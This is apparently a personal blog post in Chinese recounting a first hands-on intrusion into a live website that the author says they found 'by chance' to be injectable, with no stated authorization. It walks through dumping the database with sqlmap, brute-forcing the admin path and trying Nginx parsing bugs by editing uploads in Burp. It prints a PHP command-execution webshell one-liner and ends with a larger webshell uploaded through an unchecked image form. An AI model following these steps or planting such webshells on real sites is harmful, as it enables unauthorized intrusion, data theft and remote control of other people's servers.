首次渗透实战测试笔记
偶然得知该网站存在sql注入,手工有点差,直接使用了sqlmap进行暴库。网站没有防火墙,所以相对比较轻松。
信息收集
1.SQL注入验证存在
数据库为 mysql
the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Nginx 1.14.1
back-end DBMS: MySQL >= 5.6 (Percona fork)
2.爆数据table
3.爆用户账户
4.MySQL权限只有个usage,权限较低
5.尝试登录网站
-
首先需要获得网站的管理界面
使用御剑后台扫描珍藏版爆破,可能是操作姿势不对,无果
使用御剑爆破,用自带的字典爆出了robots.txt
-
/adm/登录后台
-
寻找上传编辑器
找到了一处上传商品图片地方,想到可以使用图片解析漏洞
nginx 1.14.1解析漏洞
漏洞原理
1,Nginx越界读取缓存漏洞(CVE-2017-7529) 可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。
2,Nginx 文件名逻辑漏洞(CVE-2013-4547) 主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。
3,Nginx解析漏洞复现 第3和第2都是文件解析漏洞,只是利用的方式不同,第2利用方式为:1.png.php。而第3利用方式为:1.png/.php。这样,1.png文件就会当成php文件进行解析。从而造成代码执行等。
测试nginx漏洞
-
准备php,命名为2fuckm.php
<?php system($_GET['cmd']);?>
-
然后上传该文件,进行抓包
-
在文件名后面加上一个空格,进行放包
-
在前端通过图片右键可以复制图片的网址,然后访问图片,发现网址存储图片的位置,先访问刚才上传的网址,不存在
界面报404错误,上传的文件找不到,是因为浏览器自动将空格编码为%20,服务器中找不到文件。
-
发送请求并使用burpsuite抓包。进到16进制中,在.jpg和.php中间加入 [20][00]
-
放到重放器
-
复现失败,错误原因不清楚
上传小马
图片解析失败,尝试上传小木马远控
上传没有对上传文件进行限制,所以可以直接上传
可以直接访问,但是菜刀连接失败,原因不清,有表哥说是因为get,post问题
直接上传大马,可以直接访问webshell,使用冰蝎3连接成功
提权目前还需要深入研究